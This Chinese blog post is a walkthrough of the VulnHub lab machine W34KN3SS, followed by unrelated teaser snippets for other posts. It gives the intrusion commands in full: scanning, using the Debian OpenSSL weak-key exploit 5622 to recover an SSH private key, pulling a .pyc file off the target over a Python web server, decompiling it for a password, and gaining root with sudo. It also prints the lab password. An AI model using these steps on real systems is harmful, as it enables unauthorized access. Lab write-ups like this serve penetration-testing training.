当前位置：首页 > news >正文

vulnhub靶机 W34KN3SS（渗透测试详解）

news 2026/2/10 1:11:02

一、靶机信息收集

1、靶机下载地址

https://download.vulnhub.com/w34kn3ss/W34KN3SS.ova

2、扫描靶机IP

3、探测靶机端口、主机、服务版本信息

nmap -sS -sV -A -p- 192.168.31.160

4、进行目录扫描

二、web渗透测试

1、访问靶机IP

没什么发现

2、进行目录拼接访问

拼接test

提示需要 key

3、查看443端口得到的域名 weakness.jth

请求不到，绑定一下hosts文件

再次访问

兔子尾巴写了个n30，可能是密码

4、对目录进行扫描

dirb http://weakness.jth/

拼接访问 private

有两个文件，看一下内容

mykey.pub

notes.txt，提示这个 key 由 openssl 0.9.8c-1 生成

5、 kali 用 searchsploit 查一下

searchsploit 0.9.8c-1 搜索
searchsploit -m 5622 下载

查看5622文件

提示需要下载

wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2

解压

tar vxjf 5622.tar.bz2

匹配 mykey.pub 内容

grep -r -l "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApC39uhie9gZahjiiMo+k8DOqKLujcZMN1bESzSLT8H5jRGj8n1FFqjJw27Nu5JYTI73Szhg/uoeMOfECHNzGj7GtoMqwh38clgVjQ7Qzb47/kguAeWMUcUHrCBz9KsN+7eNTb5cfu0O0QgY+DoLxuwfVufRVNcvaNyo0VS1dAJWgDnskJJRD+46RlkUyVNhwegA0QRj9Salmpssp+z5wq7KBPL1S982QwkdhyvKg3dMy29j/C5sIIqM/mlqilhuidwo1ozjQlU2+yAVo5XrWDo0qVzzxsnTxB5JAfF7ifoDZp2yczZg+ZavtmfItQt1Vac1vSuBPCpTqkjE/4Iklgw== root@targetcluster"

得到公钥

rsa/2048/4161de56829de2fe64b9055711f531c1-2537.pub

6、进入对应目录，公钥连接ssh，连接成功

cd rsa/2048
ssh -i 4161de56829de2fe64b9055711f531c1-2537 n30@192.168.31.160

三、提权

1、查看当前目录

有俩文件

查看 user.txt

查看 code 文件类型

file code

把文件 copy 到网站根目录，开启一个临时 web 服务，下载下来

cp code /var/www/html
cd /var/www/html
python3 -m http.server
wget http://192.168.23.188:8000/code

利用kali远程下载下来

使用 uncompyle6，下载命令

pip install uncompyle6

修改 code 名为 code.pyc，使用 uncompyle6 反编译，得到密码

mv code code.pyc
uncompyle6 code.pyc

成功得到密码

n30:dMASDNB!!#B!#!#33

2、连接ssh

查看当前权限

直接sudo su 提权

提权成功！！！

vulnhub靶机 W34KN3SS（渗透测试详解）

一、靶机信息收集 1、靶机下载地址 https://download.vulnhub.com/w34kn3ss/W34KN3SS.ova 2、扫描靶机IP 3、探测靶机端口、主机、服务版本信息 nmap -sS -sV -A -p- 192.168.31.160 4、进行目录扫描二、web渗透测试 1、访问靶机IP 没什么发现 2、进行目录拼接访问拼接…...

编程日记 2024/8/16 19:33:16

2024年8月16日嵌入式学习

今日复习信号量的知识点和学习了进程间通信和管道总结信息量: 共享进程资源方便线程抢占公共资源带来的问题 1. 互斥访问需要互斥锁来保障原子性操作使操作过程完整互斥锁: a.初始化锁 b.加锁 //使用资源之前 …...

编程日记 2024/8/16 19:32:15

vue+ckEditor5 复制粘贴wold文字+图片并保存格式

第一步在vue2项目下安装 npm install --save ckeditor/ckeditor5-build-decoupled-document 第二项目下新建一个plugins的文件夹将这个包ckeditor5-build-classic放入 （包在页面最上方有个下载按钮可以下载） 刚开始时 ckeditor5-build-classic文件…...

编程日记 2024/8/16 19:29:11

redis列表若干记录

2、列表 ziplist ziplist参数 entry结构 entry-data:节点存储的元素prelen：记录前驱节点长度encoding：当前节点编码格式encoding encoding属性使用多个子节点存储节点元素长度，这种多字节数据存储在计算机内存中或者进行网络传输的时的字节…...

编程日记 2024/8/16 19:28:10

固态硬盘用mbr还是GPT?固态硬盘分区类型用mbr还是GPT分析

固态硬盘用mbr还是GPT？答：固态硬盘分区类型用mbr还是gpt其实取决于你对分区要求及引导模式。我们知道现在的引导模式有uefi和legacy两种引导模式，如果采用的是uefi引导模式，分区类型对应的就是gpt分区(guid)，如果引导模…...

编程日记 2024/8/16 19:26:08

http/sse/websocket 三大协议演化历史以及 sse协议下 node.js express 服务实现打字机案例负载均衡下的广播实现机制

背景自从2022年底chatgpt上线后，sse就进入了大众的视野，之前是谁知道这玩意是什么？但是打字机的效果看起来是真的很不错，一度吸引了很多人的趋之若鹜，当然了这个东西的确挺好用，而且实现很简单&#xff0…...

编程日记 2024/8/16 19:21:02

智能时代新宠：2024年录音转文字软件

无论是学生群体记录课堂笔记，职场人士整理会议纪要，还是自媒体创作者捕捉灵感火花，录音转文字软件都以其独特的便利性和高效性赢得了广泛的好评。今天，就让我们一起探索那些深受大家喜爱的录音转文字工具吧。 1.365在线转文字链…...

编程日记 2024/8/16 19:20:01

【Python机器学习】树回归——使用Python的tkinter库创建GUI

机器学习给我们提供了一些强大的工具，能从未知数据中抽取出有用的信息。因此，能否这些信息以易于人们理解的方式呈现十分重要。如果人们可以直接与算法和数据交互，将可以比较轻松的进行解释。其中一个能够同时支持数据呈现和用户交互的方式就…...

编程日记 2024/8/16 19:19:00

谷歌浏览器网页底图设置为全黑

输入网址：chrome://flags/ 搜索dark，选择Enabled，重启浏览器即可...

编程日记 2024/8/16 19:16:57

Unity | AmplifyShaderEditor插件基础（第二集：模版说明）

目录一、前言二、核心模版和URP模版 1.区别介绍 2.自己的模版三、输出节点 1.界面 2.打开OutPut 3.ShderType 4.ShaderName 5.Shader大块内容 6.修改内容四、预告一、前言内容全部基于以下链接基础以上讲的。 Unity | Shader基础知识（什么是shader…...

编程日记 2024/8/16 19:15:56

【Linux入门】Linux常见指令

目录前言一、Linux基本指令 1.ls指令 2.pwd命令 3.cd 指令 4.touch指令 5.mkdir指令 6.rmdir指令 && rm 指令 7.man指令 8.cp指令 9.mv指令 10.cat 11.date 12.top 13.shutdown-关机 14.重要的几个热键二、Linux扩展指令总结前言 Linux指令是在…...

编程日记 2024/8/16 19:12:54

startData

某音startData 记得加入学习群： python爬虫&js逆向3 714283180...

编程日记 2024/8/16 19:11:53

CV每日论文--2024.7.24

1 、AutoAD-Zero: A Training-Free Framework for Zero-Shot Audio Description 中文标题：T2V-CompBench：组合文本到视频生成的综合基准AutoAD-Zero：零样本音频描述的免训练框架简介：我们的目标是以无需训练的方式为电影和电视剧…...

编程日记 2024/8/16 19:09:50

大语言模型的简易可扩展增量预训练策略

前言原论文：Simple and Scalable Strategies to Continually Pre-train Large Language Models翻译文件已整理至Github项目Some-Paper-CN，欢迎大家Star！ 摘要大语言模型（LLMs）通常需要在数十亿个tokens上进行预训…...

编程日记 2024/8/16 19:08:49

python学习之异常

在编程中，异常是指程序运行时发生的错误或异常情况，它们可能会打断程序的正常流程。不同的编程语言定义了自己的一套异常类型。在Python中，异常是基于类和对象的，所有的异常都继承自内置的BaseException类。以下是Python中一些常…...

编程日记 2024/8/16 19:07:47

多张图像实现全景无痕拼接操作

目录编辑 1，图像拼接的作用 2，实现步骤 3，效果展示 1，图像拼接的作用视觉扩展：通过拼接，可以将多个视角的图像合并，创造出比单张图片更广阔的视野。数据整合：在科学研究和地…...

编程日记 2024/8/16 19:06:46

在阿里云ecs上构建一个WordPress博客网站

1、购买ECS 使用抢占式实例，RDS 使用按量付费 2、在安全组的出入方向添加80端口 3、购买一个公网IP绑定该ecs 4、云数据库rds选择按量付费 5、创建一个名为test_user的普通账号 6、创建数据库 7、设置RDS实例白名单 8、远程登录ecs实例 9、安装apache服务及其扩展包…...

编程日记 2024/8/16 19:05:45

安卓应用开发学习：查看手机传感器信息

一、引言在手机app的开发中经常会用到手机的传感器，在《Android App 开发进阶与项目实战》一书的第10章就介绍了传感器的一些功能和用法。要想使用传感器，首先得知道手机具备哪些传感器。书中有传感器类型取值的说明，并提供了一个查看手机传…...

编程日记 2024/8/16 19:03:42

C语言字符串缺陷

目录补缺： 正题开始： 思考： 解决方案： 1.string类 2.redis库简介： 对于处理字符串的好处： 下期预告：内容待定补缺： 在上期内容的结尾我留下了一个问题，这个问…...

编程日记 2024/8/16 19:01:40

分布式场景中的常见的技术问题及解决，如分布式锁、分布式事务、分布式 session、分布式任务调度

目录一、分布式锁二、分布式事务三、分布式Session 四、分布式任务调度在分布式场景中，常见的技术问题及其解决方案涉及多个方面，包括分布式锁、分布式事务、分布式session和分布式任务调度。以下是对这些问题的详细探讨： 一、分布式…...

编程日记 2024/8/16 19:00:38

eNSP-Cloud(实现本地电脑与eNSP内设备之间通信)

说明： 想象一下，你正在用eNSP搭建一个虚拟的网络世界，里面有虚拟的路由器、交换机、电脑（PC）等等。这些设备都在你的电脑里面“运行”，它们之间可以互相通信，就像一个封闭的小王国。但是&#…...

编程新知 2026/2/8 4:37:17

MPNet：旋转机械轻量化故障诊断模型详解python代码复现

目录一、问题背景与挑战二、MPNet核心架构 2.1 多分支特征融合模块（MBFM） 2.2 残差注意力金字塔模块（RAPM） 2.2.1 空间金字塔注意力（SPA） 2.2.2 金字塔残差块（PRBlock） 2.3 分类器设计三、关键技术突破 3.1 多尺度特征融合 3.2 轻量化设计策略 3.3 抗噪声…...

编程新知 2026/2/7 5:16:28